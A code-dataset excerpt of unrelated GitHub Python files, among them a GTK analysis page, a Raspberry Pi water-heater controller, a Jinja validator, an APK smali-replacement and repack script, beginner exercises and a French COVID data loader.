domainwidth,\n# self.btmPane.size_request()[0] - opertnwidth - samplewidth)\n# debug.fmsg(\"topPane\", self.topPane.size_request(),\n# \"output\", outputwidth, \"domain\", domainwidth)\n# debug.fmsg(\"btmPane\", self.btmPane.size_request(), \n# \"operation\", opertnwidth, \"sample\", samplewidth)\n# debug.fmsg(\"gutterwidth=\", gutterwidth)\n# # gutterwidth = 5\n# totalwidth = (max(outputwidth, opertnwidth) +\n# max(domainwidth, samplewidth) +\n# gutterwidth)\n# debug.fmsg(\"totalwidth\", totalwidth)\n# self.topPane.set_size_request(totalwidth, -1)\n# self.btmPane.set_size_request(totalwidth, -1)\n# self.topPane.set_position(self.btmPane.get_position())\n\n # Synchronize the top and bottom panes\n synccount = 0 # suppresses recursion \n def paneMovedCB(self, pane, gparamspec, otherpane):\n self.synccount += 1\n if self.synccount == 1:\n pos = pane.get_position()\n # Try to move the other pane to the position of the one\n # that just moved and triggered this callback.\n self._setPanePos(otherpane, pos)\n # The other pane may not have been able to move far\n # enough. If it didn't make it, move this pane back to\n # keep them synchronized. If this causes objectionable\n # flicker, just comment out the following line.\n# self._setPanePos(pane, otherpane.get_position())\n elif self.synccount > 1:\n self.synccount = 0\n def _setPanePos(self, pane, pos):\n self.paneSignals[pane].block()\n try:\n pane.set_position(pos)\n finally:\n self.paneSignals[pane].unblock()\n def currentMeshContext(self):\n meshname = self.meshwidget.get_value()\n try:\n return ooflib.engine.mesh.meshes[meshname]\n except KeyError:\n return None\n \n def sensitize_widgets(self, *args):\n debug.mainthreadTest()\n meshctxt = self.currentMeshContext()\n meshok = meshctxt and not meshctxt.outOfSync()\n go_sensitive = bool(\n meshok and \n self.op_obj.isValid() and\n self.output_obj.isValid() and \n self.destwidget.isValid() and\n self.domain_obj.isValid() and \n self.sample_obj.isValid() and\n self.timeWidget.isValid() and\n self.domain_obj.get_value().compatible(self.output_obj.get_value())\n )\n \n self.go_button.set_sensitive(go_sensitive)\n namedok = len(namedanalysis.analysisNames()) > 0\n self.sensitizeBottomRow(go_sensitive, namedok)\n self.namedAnalysisChooser.gtk.set_sensitive(namedok)\n\n def updateOperations(self, gtkobj):\n self.op_obj.refresh()\n self.sensitize_widgets()\n\n def getOutput(self):\n return self.output_obj.get_value()\n\n def analysesChanged(self, *args):\n self.sensitize_widgets()\n self.setNamedAnalysisChooser()\n\n # Switchboard, (\"new who\", \"Mesh\")\n def new_mesh(self, mesh):\n path = labeltree.makePath(mesh)\n self.meshwidget.set_value(path)\n self.sensitize_widgets()\n\n def new_skel(self, skeleton): # switchboard (\"new who\", \"Skeleton\")\n # Switch automatically to a new Skeleton only if there is no\n # current Mesh.\n if not self.meshwidget.get_value(): # no mesh\n self.meshwidget.set_value(skeleton)\n\n # Callback from \"operation\" registered callback.\n def newOperationCB(self, registration):\n self.sensitize_widgets()\n\n def newDomainCB(self, registration):\n self.sensitize_widgets()\n\n def newSampleCB(self, registration):\n self.sensitize_widgets()\n\n #=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#\n\n # Manipulation of named analyses.\n\n def setNamedAnalysisChooser(self, *args):\n if self.suppressRetrievalLoop:\n return\n # Display the name for the current analysis if the current\n # settings happen to match a named analysis. Call this\n # whenever anything on the page changes.\n \n self.namedAnalysisChooser.update(['']\n + namedanalysis.analysisNames())\n\n # If the get_value calls fail, the widgets aren't in a valid\n # state, and therefore there's no current name.\n # findNamedAnalysis returns \"\" if it can't find a match.\n try:\n currentname = namedanalysis.findNamedAnalysis(\n self.op_obj.get_value(),\n self.output_obj.get_value(),\n self.domain_obj.get_value(),\n self.sample_obj.get_value())\n except:\n currentname = \"\"\n self.namedAnalysisChooser.set_state(currentname)\n gtklogger.checkpoint(\"named analysis chooser set\")\n\n def createCB(self, gtkobj): # create a named analysis\n menuitem = analyzemenu.namedanalysismenu.Create\n if parameterwidgets.getParameters(menuitem.get_arg('name'),\n title='Name an analysis operation',\n scope=self):\n menuitem.callWithDefaults(\n operation=self.op_obj.get_value(),\n data=self.output_obj.get_value(),\n domain=self.domain_obj.get_value(),\n sampling=self.sample_obj.get_value())\n \n def deleteCB(self, gtkobj): # delete named analysis\n menuitem = analyzemenu.namedanalysismenu.Delete\n if parameterwidgets.getParameters(menuitem.get_arg('name'), \n title='Delete a named analysis',\n scope=self):\n menuitem.callWithDefaults()\n\n def retrieveCB(self, gtkobj, name): # retrieve named analysis\n if name: # can be empty\n analysis = namedanalysis.getNamedAnalysis(name)\n self.suppressRetrievalLoop = True\n try:\n self.op_obj.set(analysis.operation, interactive=False)\n self.output_obj.set_value(analysis.data)\n self.domain_obj.set(analysis.domain, interactive=False)\n self.sample_obj.set(analysis.sampling, interactive=False)\n finally:\n self.suppressRetrievalLoop = False\n gtklogger.checkpoint(\"retrieved named analysis\")\n\n def savenamedCB(self, gtkobj): # save named analysis defs to a file\n menuitem = analyzemenu.namedanalysismenu.SaveAnalysisDefs\n if parameterwidgets.getParameters(title=\"Save Analysis Definitions\",\n ident=\"SaveAnalysis\",\n *menuitem.params):\n menuitem.callWithDefaults()\n\n #=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#\n\n # \"Go\" button callback -- fill in the basic parameters, and\n # perform the action.\n def go_buttonCB(self, gtkobj):\n op_reg = self.op_obj.get_value()\n regname = op_reg.getRegistration().name()\n menuitem = analyzemenu.ops_menu.getItem(\n utils.space2underscore(regname))\n\n menuitem.callWithDefaults(mesh=self.meshwidget.get_value(),\n time=self.timeWidget.get_value(),\n data=self.output_obj.get_value(),\n domain=self.domain_obj.get_value(),\n sampling=self.sample_obj.get_value(),\n destination=self.destwidget.get_value())\n \n\n \nanalyzepage = AnalyzePage()\n","repo_name":"usnistgov/OOF3D","sub_path":"SRC/engine/IO/GUI/analyzePage.py","file_name":"analyzePage.py","file_ext":"py","file_size_in_byte":22867,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"40313110156","text":"import os\nimport glob\nfrom time import time, sleep\nimport RPi.GPIO as GPIO\nimport csv\nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n#Initialize GPIO\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nFMPIN = 6 #flow meter GPIO pin\nVPIN = 12 #valve GPIO pin\nHEPIN = 25 #heating element pin\nTSPIN = 23 #temperature sensor pin\nGPIO.setup(FMPIN, GPIO.IN, GPIO.PUD_UP) #setup flow meter pin as input\nGPIO.setup(VPIN, GPIO.OUT, initial=GPIO.LOW) #setup valve pin as output\nGPIO.add_event_detect(FMPIN, GPIO.RISING) #add rising edge detection\nGPIO.setup(HEPIN, GPIO.OUT, initial=GPIO.LOW) #setup heating element pin as output\nGPIO.setup(TSPIN, GPIO.IN, pull_up_down=GPIO.PUD_UP) #setup temp. sensor pin as input\n\n#Initialize temperature sensor\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28-00043e9dc3ff')[0]\ndevice_file = device_folder + '/w1_slave'\n\n#Define functions for reading from temperature sensor\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n\ndef read_temp():\n lines = read_temp_raw()\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp_c = float(temp_string) / 1000.0\n temp_f = temp_c * 9.0 / 5.0 + 32.0\n return temp_f\n\n#Define function to draw water\ndef draw_water(target):\n if target == 0:\n print('No draw for this hour')\n return()\n print ('Drawing %.2f gallon(s).' % target)\n volume = 0\n numPulses = 0\n GPIO.output(VPIN, GPIO.HIGH) #open valve\n while volume < target: #keep valve open until desired volume has passed\n if GPIO.event_detected(FMPIN):\n numPulses += 1 #Count pulses from flow meter\n volume = float(numPulses) / 476 #Calculate volume\n GPIO.output(VPIN, GPIO.LOW) #close valve\n print ('Volume drawn: %.2f gallon(s).' % volume)\n\n#Read csv file with daily usage profile (one column for hours, one for gallons)\ndp = pd.read_csv('DailyProfile.csv')\nhours = []\ngallons = []\nrow = 0\nwhile row < len(dp):\n hours.append(dp.get_value(row,'Hour '))\n gallons.append(dp.get_value(row,'gallons'))\n row += 1\n\n#Create file for temperature sensor data\nPATH = 'Waterheater_Data.csv'\nif os.path.isfile(PATH):\n print('A temperature data log already exists and will be overwritten.')\nelse:\n print('No temperature data log exists. A new one will be created')\ndata = open('Waterheater_Data.csv', 'w')\ndata.write('Time, Temperature\\n')\ndata.close()\n\n#Initialize plot figure\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n\n#Define function to animate plot\ndef animate(i):\n pullData = open('Waterheater_Data.csv','r').read()\n dataArray = pullData.split('\\n')\n temps = []\n for eachLine in dataArray:\n if len(eachLine)>1:\n x,y = eachLine.split(',')\n if x[0].isdigit():\n temps.append(float(y))\n ax1.clear()\n ax1.plot(temps)\n\n\nstate = 0 #Variable to mark heating element state (0 is off)\n#Enter main program loop\nwhile True:\n now = datetime.now() #Update time\n new_row = str() #Initialize string for new data row\n\n #Read temperature sensor, and adjust heating element if too hot or cold\n temp = read_temp()\n if temp > 120 and state == 1:\n GPIO.output(HEPIN, GPIO.LOW)\n state = 0\n print('Temperature has exceeded 120 degrees - turning off heating element.')\n elif temp < 118 and state == 0:\n GPIO.output(HEPIN, GPIO.HIGH)\n state = 1\n print('Temperature is below 118 degrees - turning on heating element.')\n\n #Log data every 10 minutes\n if now.minute % 1 == 0 and now.second == 0:\n new_row = new_row + str(now.hour) + ':' + str(now.minute) + ',' + str(temp)\n data = open('Waterheater_Data.csv', 'a')\n data.write(new_row + '\\n')\n data.close\n print('Logging data: %.2f degrees Fahrenheit at %g:%g' % (temp,now.hour,now.minute))\n sleep(1)\n \n #Draw water at the start of each hour\n for i in range(len(hours)):\n if hours[i] == now.hour and now.minute == 0 and now.second < 2:\n draw_water(gallons[i]) #Draw scheduled volume for current hour\n sleep(2) #Wait two seconds to prevent draw_water call from repeating\n\n ani = animation.FuncAnimation(fig,animate, interval=1000)\n plt.ion()\n plt.show()\n","repo_name":"clarke6/LeightonScratch","sub_path":"WH_Controller_Animated.py","file_name":"WH_Controller_Animated.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20000766827","text":"import os\nfrom typing import Any, Iterator\n\nfrom jinja2 import Environment, meta\n\nfrom ..util.logger import logger\nfrom .jinja_env import get_jinja_env\nfrom .template_data import TemplateDataLoader\n\nVERSION_KEY = \"version\"\n\n\ndef validate_template_data(\n templates_dir: str, template_name: str, data_loader: TemplateDataLoader\n) -> None:\n \"\"\"\n Check if the environment is correct to build the template\n \"\"\"\n env = get_jinja_env(\n templates_dir=templates_dir, template_data=data_loader.data(with_escaped=True)\n )\n\n if VERSION_KEY in data_loader.data():\n undeclared_variables = set()\n else:\n undeclared_variables = set([VERSION_KEY])\n\n for parsedTemplate in __templates_generator(env, template_name):\n undeclared_variables.update(meta.find_undeclared_variables(parsedTemplate))\n\n if undeclared_variables:\n raise ValueError(f\"Some environment variables are undeclared -> {undeclared_variables}\")\n\n\ndef __templates_generator(env: Environment, template_name: str) -> Iterator[Any]:\n \"\"\"\n Iterate over template and subtempletes\n \"\"\"\n templates_dir = env.loader.searchpath[0]\n\n # Load template string\n template_string = __load_file(file_path=os.path.join(templates_dir, template_name))\n\n parsed_template = env.parse(template_string)\n yield parsed_template\n\n for subtemplate_name in meta.find_referenced_templates(parsed_template):\n yield from __templates_generator(env, subtemplate_name)\n\n\ndef __load_file(file_path: str) -> str:\n \"\"\"Load a file in memory\n Args:\n file_path ([str]): [path on the filesystem to the file]\n\n Returns:\n [str]: [content]\n \"\"\"\n content = str()\n try:\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\n content = file.read()\n except FileNotFoundError as f_not_found_err:\n logger.error(\"File %s not found. Aborting\", file_path)\n raise FileNotFoundError from f_not_found_err\n except OSError as os_err:\n logger.error(\"OS error occurred trying to open %s\", file_path)\n raise OSError from os_err\n except Exception as err:\n logger.error(\"Unexpected error opening %s\", file_path)\n raise err\n return content\n","repo_name":"meero-com/pre-commit-hooks","sub_path":"pre_commit_hooks/render_jinja_template_lib/data_validation.py","file_name":"data_validation.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37648907324","text":"# AIRBNB\n\"\"\"\n SOLVED -- NO SIMILAR PROBLEM FOUND\n Given a phone number, return all valid words \n that can be created using that phone number.\n For instance, given the phone number 364\n we can construct the words ['dog', 'fog'].\n\"\"\"\n\nlettersMaps = {\n 1: [],\n 2: ['a', 'b', 'c'],\n 3: ['d', 'e', 'f'],\n 4: ['g', 'h', 'i'],\n 5: ['j', 'k', 'l'],\n 6: ['m', 'n', 'o'],\n 7: ['p', 'q', 'r', 's'],\n 8: ['t', 'u', 'v'],\n 9: ['w', 'x', 'y', 'z'],\n 0: []\n}\n\nvalidWords = ['dog', 'fish', 'cat', 'fog']\n\n# if validWords changes frequently (is not same for many phone),\n# the brute force approach is better. For q queries [Time: O(q*n*m) Space: O(1)]\n# otherwise,\n# we can process all validwords once and create a segment tree\n# [Time: O(n*m) Space: O(n*m)] For q queries [Time: O(q*m) Space: O(1)]\n\n\ndef makeWords_brute(phone):\n sol = []\n for w in validWords:\n if len(w) == len(phone):\n i = 0\n while i < len(w):\n if w[i] not in lettersMaps[int(phone[i])]:\n break\n i += 1\n if i == len(w):\n sol.append(w)\n return sol\n\n\nprint(makeWords_brute('364'))\n# ['dog', 'fog']\n","repo_name":"SuchismitaDhal/Solutions-dailyInterviewPro","sub_path":"2020/07-July/07.21.py","file_name":"07.21.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36350506289","text":"\"\"\"\nCreated on Dec 20, 2015\n\n@author: sohara\n\"\"\"\nimport shapely.geometry as sg\nimport pyvision3 as pv3\n\n\ndef annotation_demo():\n \"\"\"\n Demonstrates several annotation methods of the Image class\n \"\"\"\n img = pv3.Image(pv3.IMG_DRIVEWAY, desc=\"Annotations Demo\") # load a sample image\n\n # annotate a point as a small filled circle\n img.annotate_point((250, 250), color=pv3.RGB_BLACK)\n img.annotate_point((300, 300)) # default color is red\n\n # annotate text next to the brown point, blue on white background\n img.annotate_text(\n \"Waldo was here\", (254, 246), color=pv3.RGB_BLUE, bg_color=pv3.RGB_WHITE\n )\n\n # complex polygon with an exterior and an interior 'hole'\n exterior = ((50, 50), (25, 125), (50, 200), (200, 200), (200, 50), (50, 50))\n interior = ((100, 100), (100, 150), (150, 150), (175, 125), (150, 100), (100, 100))\n poly = sg.Polygon(exterior, [interior])\n img.annotate_shape(poly, color=pv3.RGB_CYAN, fill_color=pv3.RGB_GREEN, thickness=2)\n\n # two concentric circles\n img.annotate_circle((400, 400), 75, color=pv3.RGB_PURPLE, thickness=5)\n img.annotate_circle(\n (400, 400), 60, color=pv3.RGB_PURPLE, thickness=-1\n ) # filled circle\n\n # a LineString\n lines = sg.LineString(((10, 25), (382, 122), (251, 470)))\n img.annotate_shape(lines, thickness=4, color=pv3.RGB_RED)\n\n # a Rectangle\n img.annotate_rect(\n (538, 212), (600, 300), color=pv3.RGB_ORANGE, thickness=3\n ) # -1 for filled\n\n # show the image with annotations\n # NOTE: to NOT show the annotations, set annotations=False in the following\n # img.show_annotation(window_title=\"Mask Layer\", highgui=True, delay=1)\n img.show(\n window_title=\"Annotated Image\", highgui=True, delay=0, annotations_opacity=0.5\n )\n\n\nif __name__ == \"__main__\":\n print(\"====================================================\")\n print(\"Set focus to display window and hit any key to exit.\")\n print(\"====================================================\")\n annotation_demo()\n","repo_name":"svohara/pyvision3","sub_path":"examples/annotate_an_image.py","file_name":"annotate_an_image.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"27252918219","text":"people = 30\ncats = 100\ndogs = 45\n\n\nif people < cats:\n print(\"Too many cats! The world is doomed!\")\n\nif people > cats:\n print(\"Not many cats! The world is saved!\")\n\nif people < dogs:\n print(\"The world is drooled on!\")\n\nif people > dogs:\n print(\"The world is dry!\")\n\n\ndogs += 5\n\nif people >= dogs:\n print(\"People are greater than or equal to dogs.\")\n\nif people <= dogs:\n print(\"People are less than or equal to dogs.\")\n\n\nif people == dogs:\n print(\"People are dogs.\")\n\nif True:\n print(\"test\")\n\n\n\"\"\"\nStudy Drills\n\n\n1. What do you think the if does to the code under it?\nIt basically tells Python to read what each variable means and act based on the response.\n\n2. To show that it belongs to that block of code.\n\n3. It won't work. IndentationError.\n\n4. Yes.\n\n5. The answers will change.\n\n\"\"\"\n","repo_name":"sk610/Learn-Python-3-The-Hard-Way","sub_path":"Exercises/21-30/ex29.py","file_name":"ex29.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24067204928","text":"#!/usr/bin/python3\ndef weight_average(my_list=[]):\n total_vw, total_w, weighted_mean = 0, 0, 0\n if len(my_list) == 0 or my_list is None:\n return 0\n else:\n for duo in my_list:\n value, weight = duo\n vw = value * weight\n total_vw += vw\n total_w += weight\n weighted_mean = total_vw / total_w\n return weighted_mean\n","repo_name":"awolcat/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/100-weight_average.py","file_name":"100-weight_average.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26954661781","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Program Structure - Part II\n# \n# Up until this point, everything we have presented is true for\n# practically any programming language. They all have a branching\n# structure, and a looping structure. They all deal with boolean\n# variables, and have some form of function or subroutine structure to\n# break up problems into smaller pieces. Now we add lists and dictionaries\n# to the mix, and really add a lot of power to our programs.\n\n# ## Lists\n# \n# Python supports lists as a basic data structure. For example, you can do\n\n# In[8]:\n\n\na=[-4,4,10,-2,20]\nprint(a)\n\n\n# In[2]:\n\n\na[3]\n\n\n# In[3]:\n\n\na[0]\n\n\n# In[4]:\n\n\na[5]\n\n\n# Notice that you can access the elements of a list like `a[2]`, and that\n# the elements are numbered starting with **0**, not 1. If you try to\n# access beyond the length of a list, then an error results.\n# \n# When using the multiply operator, `*`, the list gets duplicated. For\n# example,\n\n# In[9]:\n\n\na=[1]*5\nprint(a)\n\n\n# The length of a list is given by the function `len`. This lets you cycle\n# through the values of a list easily.\n\n# In[11]:\n\n\na=[-4,4,10,-2,20]\nfor i in range(len(a)):\n if a[i]>0:\n print(\"The element number \",i,\" is greater than zero\")\n\n\n# The `for-loop` can more easily be used to loop through the values of the list, rather than looping through the index numbers,\n\n# In[12]:\n\n\na=[-4,4,10,-2,20]\nfor value in a:\n if value>0:\n print(\"The value \",value,\" is greater than zero\")\n\n\n# ### A Warning about Copying Lists\n# \n\n# In the way that Python works, if you do:\n\n# In[13]:\n\n\na=[1,2,3,4,5]\nb=a\n\n\n# Then `b` is not a copy of `a`, but the **same list** as `a`. Modifying\n# `b` also modifies `a`, for example\n\n# In[14]:\n\n\na\n\n\n# In[15]:\n\n\nb\n\n\n# In[16]:\n\n\nb[2]=100\n\n\n# In[17]:\n\n\nb\n\n\n# In[18]:\n\n\na\n\n\n# To avoid this, do the following\n\n# In[20]:\n\n\na=[1,2,3,4,5]\n\n\n# In[21]:\n\n\nb=a[:] # make a copy of a\n\n\n# In[22]:\n\n\na\n\n\n# In[23]:\n\n\nb\n\n\n# In[24]:\n\n\nb[2]=100\n\n\n# In[25]:\n\n\na\n\n\n# In[26]:\n\n\nb\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"bblais/AI-and-Robotics-Fall-2023-Class-Notebooks","sub_path":"Programming Manual/04.01 Program Structure - Part II.py","file_name":"04.01 Program Structure - Part II.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24458901136","text":"# coding=utf-8\r\nimport os\r\nfrom shutil import copyfile,copytree\r\nfrom basic_func import run_cmd\r\n\r\ntemplates = [\"templates\\\\TensorFlowInferenceInterface.smali\",\r\n \"templates\\\\a.smali\",\r\n \"templates\\\\types\\\\UInt8.smali\",\r\n \"templates\\\\Graph.smali\"]\r\n\r\ndef codereplace(replace_repack):\r\n cnt = 0\r\n obscure, notobscure = 0,0\r\n replaced = []\r\n for apkpath in replace_repack:\r\n dirs = os.listdir(apkpath)\r\n smalidir = []\r\n for d in dirs:\r\n if 'smali' in d:\r\n smalidir.append(d)\r\n flag = 0\r\n for s in smalidir:\r\n filepath = os.path.join(apkpath,s,\"org\\\\tensorflow\\contrib\\\\android\\\\\")\r\n if os.path.exists(filepath+\"TensorFlowInferenceInterface.smali\"):\r\n copyfile(templates[0],filepath+\"TensorFlowInferenceInterface.smali\")\r\n cnt+=1\r\n notobscure+=1\r\n if not(os.path.exists(os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\\\\UInt8.smali\"))):\r\n if not(os.path.exists(os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\"))):\r\n os.mkdir(os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\"))\r\n ftemp = open(os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\\\\UInt8.smali\"),\"w\")\r\n ftemp.close()\r\n copyfile(templates[2],os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\\\\UInt8.smali\"))\r\n flag = 1\r\n elif os.path.exists(filepath+\"a.smali\"):\r\n copyfile(templates[1],filepath+\"a.smali\")\r\n if os.path.exists(os.path.join(apkpath,s,\"org\\\\tensorflow\\Graph.smali\")):\r\n find = False\r\n with open(os.path.join(apkpath,s,\"org\\\\tensorflow\\Graph.smali\"),'r') as f:\r\n for line in f.readlines():\r\n if line.find(\"a([B)V\")>=0:\r\n find = True\r\n break\r\n if not find:\r\n copyfile(templates[3],os.path.join(apkpath,s,\"org\\\\tensorflow\\Graph.smali\"))\r\n cnt+=1\r\n obscure+=1\r\n flag = 1\r\n if flag==1:\r\n replaced.append(apkpath)\r\n return replaced\r\n\r\ndef repackandsign(apks,destpath,replaced):\r\n if not os.path.exists(destpath):\r\n os.mkdir(destpath)\r\n signed_path = os.path.join(destpath,'signed')\r\n if not os.path.exists(signed_path):\r\n os.mkdir(signed_path)\r\n apklist = os.listdir(apks)\r\n for apk in apklist:\r\n apkpath = os.path.join(apks,apk)\r\n if apkpath in replaced:\r\n signp = os.path.join(signed_path,apk)\r\n repackp = os.path.join(destpath,apk)\r\n cmd = 'java -jar apktool_2.4.1.jar b -o ' + repackp + '-repack.apk ' + apkpath\r\n print(\"begin to repack\")\r\n try:\r\n run_cmd(cmd)\r\n except:\r\n print('repack failed:'+apkpath)\r\n continue\r\n cmd = 'jarsigner -verbose -keystore test.keystore -storepass 123456 -signedjar '\\\r\n +signp+'-signed.apk '+ repackp + '-repack.apk test.keystore'\r\n print(\"begin to sign\")\r\n try:\r\n run_cmd(cmd)\r\n except:\r\n print('sign failed:'+apkpath)\r\n continue\r\n","repo_name":"MMGuard123/MMGuard","sub_path":"libreplace_repack.py","file_name":"libreplace_repack.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71775277547","text":"\"\"\"Update BotCommand relationship\n\nRevision ID: f14c48e6d1d1\nRevises: 8055e81feb7b\nCreate Date: 2023-08-08 12:12:16.351328\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f14c48e6d1d1'\ndown_revision = '8055e81feb7b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('servercommands', schema=None) as batch_op:\n batch_op.add_column(sa.Column('command_name', sa.String(), nullable=True))\n batch_op.add_column(sa.Column('command_description', sa.String(), nullable=True))\n batch_op.create_foreign_key(batch_op.f('fk_servercommands_command_description_botcommands'), 'botcommands', ['command_description'], ['description'])\n batch_op.create_foreign_key(batch_op.f('fk_servercommands_command_name_botcommands'), 'botcommands', ['command_name'], ['name'])\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('servercommands', schema=None) as batch_op:\n batch_op.drop_constraint(batch_op.f('fk_servercommands_command_name_botcommands'), type_='foreignkey')\n batch_op.drop_constraint(batch_op.f('fk_servercommands_command_description_botcommands'), type_='foreignkey')\n batch_op.drop_column('command_description')\n batch_op.drop_column('command_name')\n\n # ### end Alembic commands ###\n","repo_name":"lzklein/final-project-wangusbot-client","sub_path":"server/migrations/versions/f14c48e6d1d1_update_botcommand_relationship.py","file_name":"f14c48e6d1d1_update_botcommand_relationship.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22858326993","text":"import pandas as pd\nimport numpy as np\nimport json\nimport plotly\nimport os\n\nimport urllib.request\nfrom datetime import datetime\n\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.stats import chi2\nfrom numpy.linalg import inv\nimport plotly.graph_objs as go\nfrom functools import reduce\n\nclass CovidFr():\n \"\"\"\n docstring for CovidFr\n \"\"\"\n ### URL source for loading covid data\n synthesis_covid_url = 'https://www.data.gouv.fr/fr/datasets/r/63352e38-d353-4b54-bfd1-f1b3ee1cabd7'\n synthesis_dprate_url = 'https://www.data.gouv.fr/fr/datasets/r/19a91d64-3cd3-42fc-9943-d635491a4d76'\n synthesis_rprate_url = 'https://www.data.gouv.fr/fr/datasets/r/ad09241e-52fa-4be8-8298-e5760b43cae2'\n synthesis_nprate_url = 'https://www.data.gouv.fr/fr/datasets/r/57d44bd6-c9fd-424f-9a72-7834454f9e3c'\n\n def __init__(self):\n # Init basic departments data\n data_dir = os.path.realpath(os.path.dirname(__file__) + \"/../data/\")\n\n #self.department_base_data = pd.read_csv(data_dir + \"/departments.csv\")\n department_base_data = pd.read_csv(data_dir + \"/departments_rectif_pop.csv\")\n department_base_data.index = department_base_data['insee']\n self.department_base_data = department_base_data.sort_index()\n\n #self.region_base_data = pd.read_csv(data_dir + \"/regions.csv\", dtype={'insee': \"string\"})\n region_base_data = pd.read_csv(data_dir + \"/regions_rectif_pop.csv\", dtype={'insee': \"string\"})\n region_base_data.index = region_base_data['insee']\n self.region_base_data = region_base_data.sort_index()\n\n self.last_update = CovidFr.updatechecking(json_url=\"https://www.data.gouv.fr/datasets/5e7e104ace2080d9162b61d8/rdf.json\", data_request_url=CovidFr.synthesis_covid_url)\n #self.last_update = \"\"\n\n self.features = [\"rad\", \"dc\", \"hosp\", \"rea\"]\n\n self.positive_last_update = CovidFr.updatechecking(json_url=\"https://www.data.gouv.fr/datasets/5ed1175ca00bbe1e4941a46a/rdf.json\", data_request_url=CovidFr.synthesis_dprate_url)\n #self.positive_last_update = \"\"\n \n ###############################\n # required process settings\n ###############################\n self.number_all_dep = list(range(1, self.department_base_data.shape[0]+1))\n self.global_pc = list(range(1, len(self.features)+1))\n self.normalize_states = [True, False]\n self.alpha_smooth = list(np.arange(0.1, 1, 0.05).round(2))\n self.pc_reg = list(range(1, self.region_base_data.shape[0]+1))\n ##############################\n # independent default settings\n ##############################\n ## default selected number of top departments\n self.default_top_dep = 10\n #-- default settings for pca-based global monitoring\n self.default_pcdim = 2\n self.default_normalize = self.normalize_states[0]\n self.default_start_d_learn_fr = '15/05/2020'\n self.default_end_d_learn_fr = '25/08/2020'\n self.default_alpha = 0.6\n #-- default settings for pca-based region hospitalization monitoring\n self.default_pcdim_reg = 3\n self.default_normalize_reg = self.normalize_states[0]\n self.default_start_d_learn_fr_reg = '15/05/2020'\n self.default_end_d_learn_fr_reg = '25/08/2020'\n self.default_alpha_reg = 0.7\n #-- other default settings\n self.default_department = None\n self.default_region = None\n\n def load_df(self):\n \"\"\"\n Loading dataframes\n \"\"\"\n usecols = [\"dep\", \"sexe\", \"jour\", \"hosp\", \"rea\", \"rad\", \"dc\"]\n covid = pd.read_csv(CovidFr.synthesis_covid_url, sep=';', usecols=usecols).dropna()\n covid['jour'] = pd.to_datetime(covid['jour'])\n covid = covid.drop_duplicates()\n\n covid = covid.loc[covid['dep'].isin(self.department_base_data.insee.values)]\n\n self.covid = CovidFr.regionadd(data=covid)\n\n self.first_day_fr = self.covid.jour.min().strftime(\"%d/%m/%Y\")\n\n self.last_day_fr = self.covid.jour.max().strftime(\"%d/%m/%Y\")\n\n self.last_day = self.covid.jour.max().strftime(\"%Y-%m-%d\")\n\n return self.covid \n \n def load_positive_df(self):\n \"\"\"\n Loading dataframes\n \"\"\"\n #national df\n nprate = pd.read_csv(CovidFr.synthesis_nprate_url, sep=';', usecols=['jour', 'P', 'cl_age90']).dropna()\n nprate['jour'] = pd.to_datetime(nprate['jour'])\n self.nprate = nprate.drop_duplicates()\n\n #regional df\n rprate = pd.read_csv(CovidFr.synthesis_rprate_url, sep=';', dtype={'reg': \"string\"}, usecols=['reg', 'jour', 'P', 'cl_age90']).dropna()\n rprate['jour'] = pd.to_datetime(rprate['jour'])\n rprate = rprate.drop_duplicates()\n self.rprate = rprate.loc[rprate['reg'].isin(list(self.region_base_data.index))]\n\n #departmental 